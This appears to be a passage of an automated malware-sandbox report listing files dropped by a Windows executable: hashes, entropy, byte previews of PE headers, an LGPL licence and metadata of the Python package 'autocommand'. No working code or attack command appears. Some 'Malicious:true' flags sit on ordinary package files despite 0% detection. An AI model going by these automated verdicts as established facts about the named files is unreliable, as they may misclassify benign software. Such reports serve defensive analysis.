                                                                                                                                                                                                                              Size (bytes):167936
                                                                                                                                                                                                                              Entropy (8bit):6.1599583746309134
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:X6dM96V3jflSmyzGuuBKNr8RWzmpdnxbLM03c:X6dM9E3jflSmyaVQ9FzQ73c
                                                                                                                                                                                                                              MD5:551E7F7A2F2ECE49279AFFC703940EA5
                                                                                                                                                                                                                              SHA1:1A270C18F6A1FD21D5B0980D86CEEAA68FFA184E
                                                                                                                                                                                                                              SHA-256:50CD91905E7B1B93F77DE916FABC53111C99F28ED98E29859C9BBF9BE5FCE292
                                                                                                                                                                                                                              SHA-512:E94593D02D315870E0CD3A46A184E019A3A7DD08FAD8769A8146E055344C6BE70723A6641AF4FA0F1F50B24FD1DE222A587D44C7331A9B0B94733020326DC1EB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........n......."..............................................FV....`..........................................q..`....q..x....................................a..............................0a..8............0.. ............................text............................... .P`.rdata...X...0...Z..."..............@.P@.data................|..............@.P..pdata..............................@.0@.reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):748032
                                                                                                                                                                                                                              Entropy (8bit):6.322076507441975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:yd3MbPgKkTyEOvuxHEY/ChxPZAxewMjw4Jm:Y3ygKVEOv+h/C5woLJm
                                                                                                                                                                                                                              MD5:4A9E628BB3DE384DC4A622F8B8EC768A
                                                                                                                                                                                                                              SHA1:8F81B14351978D214B5804AD60A017ABF9715576
                                                                                                                                                                                                                              SHA-256:E2D24C89BF3F747F930520A3BCB18639088922C12497B431E020BCEBD231D372
                                                                                                                                                                                                                              SHA-512:4186A2D33E6BF8F4283135241C032C191E070299AEAEA433510E1FD51E07B160263C3A646CFBE0BCAC54F6C8F47910D9F1219A6FE0E0C6DC61686DA90FA8F431
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."................0...............................................A.....`.................................................l...........................................................................8............................................text...8........................... .P`.rdata..:Y.......Z..................@.P@.data....E...@..."...&..............@.P..pdata...............H..............@.0@.reloc...............f..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):89088
                                                                                                                                                                                                                              Entropy (8bit):6.142901641844917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:75yx+TYs+6S/TF7K1uA64NHo3avnpt53ID6GTmdWUqAMx53PBS2AS:7M+TLPSrFNA64NRvnptWUqAMxbS2AS
                                                                                                                                                                                                                              MD5:749B786F9E22D2C2568A845A264D077C
                                                                                                                                                                                                                              SHA1:8DA1A2F6CE0570C703607A96FE68DD258604AFF1
                                                                                                                                                                                                                              SHA-256:CA617673BA3EC4376490CB3CFDA2C61825BED98C6288B08D9EC3213E099BBD6E
                                                                                                                                                                                                                              SHA-512:7C6EB07EDE5B7D39BFBEC1F17D07EB38D7FB4AE9C6B8D5F463089B47D3AA236A3818F2CCEE44F85BA1B0278B094A39B265B972FFB57576336E89B227360E39A2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........z............................................................`..........................................>..`....>..x...............(....................1...............................1..8...............H............................text...H........................... .P`.rdata..Fb.......d..................@.P@.data...h....`.......F..............@.P..pdata..(............P..............@.0@.reloc...............Z..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):96768
                                                                                                                                                                                                                              Entropy (8bit):6.070710207063242
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:09aJTaSaUKVjVH/pLipojyDSxpPuvZ69VxiGPW5wyKikBtdi:00OJUKHp2OyYGwi5Patd
                                                                                                                                                                                                                              MD5:0C0C2EA20931677010B3B5C81497DF5C
                                                                                                                                                                                                                              SHA1:DC89ECA3C710F2858B24C4BC03ECB50C625FC558
                                                                                                                                                                                                                              SHA-256:0C3EE662BE462994E76D32DCE18B07F0C5A79362182FAD5D3EC949F64E48E272
                                                                                                                                                                                                                              SHA-512:C3D1410038A81EC778CA8A99B978D1C8C9F45A1D3E6B6FDB2AC3793E0DE59BE71627D3870C6B99E83BCA2590A4A17E5F890D2474A7A3581864325DB22AD4F33B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."......................................................................`..........................................W..\...LX..x...............................H....J...............................J..8...............8............................text............................... .P`.rdata...k.......l..................@.P@.data...(....p.......`..............@.P..pdata...............n..............@.0@.reloc..H............x..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81920
                                                                                                                                                                                                                              Entropy (8bit):6.04788799513661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Bx75TOnYA/Gwdr9W7JBBqvbawGKj5ztbaBB/jf5:B/OnlGIKBwv9j5ztG/jR
                                                                                                                                                                                                                              MD5:B22B47AA975763D430C73AC71FD1E374
                                                                                                                                                                                                                              SHA1:99FB11E17DD2127BDD0575E2ABB3ABB55B70452B
                                                                                                                                                                                                                              SHA-256:4207DC23D56E9AE66E14A956735AB955E4835C767A50ACF3C8F8E9A36DE9BFE8
                                                                                                                                                                                                                              SHA-512:BF750BD0DC2517220B5F4C8BB395FC8757E2E2B3F32B861324DAF26D95580585FD10166C629FDFF9BA64562D281EAC912A771AE18527E0440A1529DC85459186
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........r............................................................`..........................................(..`....)..x............`..\............p..........................................8...............H............................text............................... .P`.rdata...\.......^..................@.P@.data........@.......,..............@.P..pdata..\....`.......6..............@.0@.reloc.......p.......>..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):62464
                                                                                                                                                                                                                              Entropy (8bit):5.870269324324492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ly9OSfUi7fLVKDpc+tYCZSAbJHGlditEIPg/g6XsaHWq6RI4oPdxr369BIEAtX16:WBNLVKhtOmGldiTPW2qb7r3KBIdF6
                                                                                                                                                                                                                              MD5:BC7EB816D8BAC39C7003355003BF81C3
                                                                                                                                                                                                                              SHA1:2A1B151C5E72D4EF881848661DFD019B1B461316
                                                                                                                                                                                                                              SHA-256:D5F22B88AEC2236A56C1E2D9990CEC4E00BDA4DB155D9B0425B34450950BDE9E
                                                                                                                                                                                                                              SHA-512:7CA957E9D5B77305F91FD3043A4975699025CAC11790C6B8FE8A3A4FAA2A6F4E9B570EFC99F449D763DC8BC97C7AE2307A6E121ADCAAC52ADECB5E610D155F7C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........\...............................................@.......2....`.........................................0...\.......x............ ...............0......P...............................p...8............................................text...H........................... .P`.rdata...F.......H..................@.P@.data...............................@.P..pdata....... ......................@.0@.reloc.......0......................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172032
                                                                                                                                                                                                                              Entropy (8bit):6.185207380152101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:nC9DM1eFU3uj+IRZXU/W7bbJ73qK3CHd2qN4HEHFTA02+Warahu2+Warahj3qSkT:nC9DM4FU3ujlZkO7bpabHzls02+Warac
                                                                                                                                                                                                                              MD5:B611CA8FA3BC87A7355DDCCDBE8F3F93
                                                                                                                                                                                                                              SHA1:77EBF15AF059B5CDB1295F57717143DF6111EC69
                                                                                                                                                                                                                              SHA-256:396BEB486E9FDDDA95DC53A6F1096ADBBD8926F5AA3034EBBF45185A304106C1
                                                                                                                                                                                                                              SHA-512:5C0BB488BE86D87F079419273DCD93950BA860EB61FF013B71D77C30829C8DBBBB1E05D514B427303EE4F37B143288EA8ACBD9CD44AA483B1D6952EB1E201A34
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".................................................................|....`..........................................{..l...|{..x...............<....................h...............................i..8...............p............................text...h........................... .P`.rdata.."...........................@.P@.data....$...........z..............@.P..pdata..<...........................@.0@.reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):633344
                                                                                                                                                                                                                              Entropy (8bit):6.234804700155333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:S1zC7nG0yt2OXWFIPwnc7n0gZCoajSFNjwGd:S1zCEAoYIMo0gLFV5
                                                                                                                                                                                                                              MD5:772D36DFBBCBC3B635E638F3CC25036A
                                                                                                                                                                                                                              SHA1:7ABB0403BB8A44679683BD844DA93D81CBD06A13
                                                                                                                                                                                                                              SHA-256:403FDB6EE6C3CA96108F2360F949CB9EBF6B7BB3A3C55ED014D2AEC5E75AFAE7
                                                                                                                                                                                                                              SHA-512:3D9637539A4CF2E5C13C9577331E86DAF2C4B6E9E6C0231CD435A547EC5FE647B1411C2F9B707CA594374A78D9F509E724F508D58455ED0236229404CDC1B311
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....T...R.......X....................................................`..........................................m.......u..................................x....L..............................0L..8............p...............................text....S.......T.................. .P`.rdata.......p.......X..............@.P@.data...h6...........v..............@.P..pdata..............................@.0@.reloc..x...........................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202008
                                                                                                                                                                                                                              Entropy (8bit):6.367263484296302
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:4nwukKYdeMwj1XQk67ZLXni8Es7sp0HhiviBvDKax:KrqiviMax
                                                                                                                                                                                                                              MD5:815F1BDABB79C6A12B38D84AA343196D
                                                                                                                                                                                                                              SHA1:916483149875A5E20C6046CEFFEF62DD6089DDD5
                                                                                                                                                                                                                              SHA-256:31712AE276E2CED05ECDA3E1C08FBBCC2CFF8474A972626ABA55F7797F0ED8C9
                                                                                                                                                                                                                              SHA-512:1078E7E48B6F6ED160AE2BCCF80A43A5F1CCA769B8A690326E112BF20D7F3D018F855F6AA3B56D315DC0853472E0AFFCFE8E910B5CE69CE952983CFAA496C21D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(..................................................... ......?.....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6927640
                                                                                                                                                                                                                              Entropy (8bit):5.765554952149868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:Jc7/HNCHh0IWiUDFsx3hghs7g6kIPuch+Xe16/02yWYqiVx7qb4f4wmC36nhIVcF:JcBZhxsje2kUvid5E+vbHDMiEr/l9o
                                                                                                                                                                                                                              MD5:CAE8FA4E7CB32DA83ACF655C2C39D9E1
                                                                                                                                                                                                                              SHA1:7A0055588A2D232BE8C56791642CB0F5ABBC71F8
                                                                                                                                                                                                                              SHA-256:8AD53C67C2B4DB4387D5F72EE2A3CA80C40AF444B22BF41A6CFDA2225A27BB93
                                                                                                                                                                                                                              SHA-512:DB2190DA2C35BCEED0EF91D7553FF0DEA442286490145C3D0E89DB59BA1299B0851E601CC324B5F7FD026414FC73755E8EFF2EF5FB5EEB1C54A9E13E7C66DD0C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..(..6B...............................................j......dj...`.........................................pdN.d....1O.......i......._.`I....i../... i..[..0.2.T.....................H.(....2.@............ (..............................text.....(.......(................. ..`.rdata..f7'.. (..8'...(.............@..@.data....J...`O......HO.............@....pdata..`I...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc...[... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                                              SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31000
                                                                                                                                                                                                                              Entropy (8bit):6.553885009751671
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:I8RVBC9t6Lhz64SHfZslDT90YBI1QGjHQIYiSy1pCQQRaAM+o/8E9VF0NytuSS:1GyqHfK1HBI1QGT5YiSyvXAMxkEm
                                                                                                                                                                                                                              MD5:79CE1AE3A23DFF6ED5FC66E6416600CD
                                                                                                                                                                                                                              SHA1:6204374D99144B0A26FD1D61940FF4F0D17C2212
                                                                                                                                                                                                                              SHA-256:678E09AD44BE42FA9BC9C7A18C25DBE995A59B6C36A13EECC09C0F02A647B6F0
                                                                                                                                                                                                                              SHA-512:A4E48696788798A7D061C0EF620D40187850741C2BEC357DB0E37A2DD94D3A50F9F55BA75DC4D95E50946CBAB78B84BA1FC42D51FD498640A231321566613DAA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.....2......................................................._....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7634
                                                                                                                                                                                                                              Entropy (8bit):4.503638339817033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:qnJvhVL0qhYqlpIle4RrJQSqOBng4kS/cKM6b:4vjxhYWpce48engvK
                                                                                                                                                                                                                              MD5:8466CFC6533376D42EFA6F7423F2B8E8
                                                                                                                                                                                                                              SHA1:2BC8926FDBB07DB2AF0A8E3FF7A3BE545C8BDF6B
                                                                                                                                                                                                                              SHA-256:ADE78D04982D69972D444A8E14A94F87A2334DD3855CC80348EA8E240AA0DF2D
                                                                                                                                                                                                                              SHA-512:CC45DC470E107E63659B502F77E9EF44335F9427BE87639252D85181A8DEA65FA9D1B5F1BD196F782186BC61B144467888199537806A8CC15E2B462CAC0D46A5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GNU LESSER GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed.... This version of the GNU Lesser General Public License incorporates.the terms and conditions of version 3 of the GNU General Public.License, supplemented by the additional permissions listed below... 0. Additional Definitions... As used herein, "this License" refers to version 3 of the GNU Lesser.General Public License, and the "GNU GPL" refers to version 3 of the GNU.General Public License... "The Library" refers to a covered work governed by this License,.other than an Application or a Combined Work as defined below... An "Application" is any work that makes use of an interface provided.by the Library, but which is not otherwise based on the Library..Defining a subclass of a class defined by the Library is de
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (855)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15006
                                                                                                                                                                                                                              Entropy (8bit):4.800156894367144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:S037UxjwUbQd1Ak++k59jg8dXRNInXF2IOxcme+kQBd9Clb:d37U1LbQd1Z+3e8dhwXFacb+kQjQb
                                                                                                                                                                                                                              MD5:542BA4FBC993C39A0BC952BE72E8717F
                                                                                                                                                                                                                              SHA1:4310DB58F98C12B23286E5FA37F0E27ABEFB6A4A
                                                                                                                                                                                                                              SHA-256:3800D9B91DCEEA2065A6ED6279383362E97AC38B8E56B9343F404EE531860099
                                                                                                                                                                                                                              SHA-512:E3672EA056E5F2EFD3685C98DC0CF47E9A44F5A84DC457FC8AB31CD6DE09559C6E566D2D00F5B3CE55511E81A050DBB0DED6CF941916A6FF1019392FD96E1636
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: autocommand.Version: 2.2.2.Summary: A library to create a command-line program from a function.Home-page: https://github.com/Lucretiel/autocommand.Author: Nathan West.License: LGPLv3.Project-URL: Homepage, https://github.com/Lucretiel/autocommand.Project-URL: Bug Tracker, https://github.com/Lucretiel/autocommand/issues.Platform: any.Classifier: Development Status :: 6 - Mature.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3).Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Python: >=3.7.Description-Content-Type: text/markdown.License-File: LICENSE..[![PyPI version](https://badge.fury.io/py/autocommand.svg)](
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1308
                                                                                                                                                                                                                              Entropy (8bit):5.721750099226425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:kn/2zDcMvX4owkE+RlpGUttyvUMDtuH5p4D127cyOMT34:knuXNv4LkEMl0UWMF5p45AcuT34
                                                                                                                                                                                                                              MD5:52BF4937018B88B9D28ED98A76B5E2AC
                                                                                                                                                                                                                              SHA1:C8D5B732C154A2D4D501454647FAFEB356B93C4E
                                                                                                                                                                                                                              SHA-256:822BBA66B41526FA547186B80221F85DA50D652BEE5493DBFE5D14085112F0C3
                                                                                                                                                                                                                              SHA-512:30E4DEFE09FB8907166682F9A33E0F7CC0203B65113155BBEC6548A1EADF7250882AF295FF2551803703274F9F387E00439D95CBBCB63D2E04E371B94556B3EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:autocommand-2.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..autocommand-2.2.2.dist-info/LICENSE,sha256=reeNBJgtaZctREqOFKlPh6IzTdOFXMgDSOqOJAqg3y0,7634..autocommand-2.2.2.dist-info/METADATA,sha256=OADZuR3O6iBlpu1ieTgzYul6w4uOVrk0P0BO5TGGAJk,15006..autocommand-2.2.2.dist-info/RECORD,,..autocommand-2.2.2.dist-info/WHEEL,sha256=2wepM1nk4DS4eFpYrW1TTqPcoGNfHhhO_i5m4cOimbo,92..autocommand-2.2.2.dist-info/top_level.txt,sha256=AzfhgKKS8EdAwWUTSF8mgeVQbXOY9kokHB6kSqwwqu0,12..autocommand/__init__.py,sha256=zko5Rnvolvb-UXjCx_2ArPTGBWwUK5QY4LIQIKYR7As,1037..autocommand/__pycache__/__init__.cpython-312.pyc,,..autocommand/__pycache__/autoasync.cpython-312.pyc,,..autocommand/__pycache__/autocommand.cpython-312.pyc,,..autocommand/__pycache__/automain.cpython-312.pyc,,..autocommand/__pycache__/autoparse.cpython-312.pyc,,..autocommand/__pycache__/errors.cpython-312.pyc,,..autocommand/autoasync.py,sha256=AMdyrxNS4pqWJfP_xuoOcImOHWD-qT7x06wmKN1Vp-U,5680..autocommand/autoco
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViJR4KgP+tPCCfA5S:RtBMwlVifAWBBf
                                                                                                                                                                                                                              MD5:88F09A0EC874FD86ABCB9BC4E265B874
                                                                                                                                                                                                                              SHA1:786AB44FFD2F5C632B4DC5C1BF4AA2E91E579A05
                                                                                                                                                                                                                              SHA-256:DB07A93359E4E034B8785A58AD6D534EA3DCA0635F1E184EFE2E66E1C3A299BA
                                                                                                                                                                                                                              SHA-512:7FFEF1EC782D590D2879294C2895A5A8064ECD5FE7243CF602FCCE66A8A715F64436F17CE96070B613123847EE0C18AB0AA5BC87DB13E98A792DC07DD95E4BAB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.38.4).Root-Is-Purelib: true.Tag: py3-none-any..
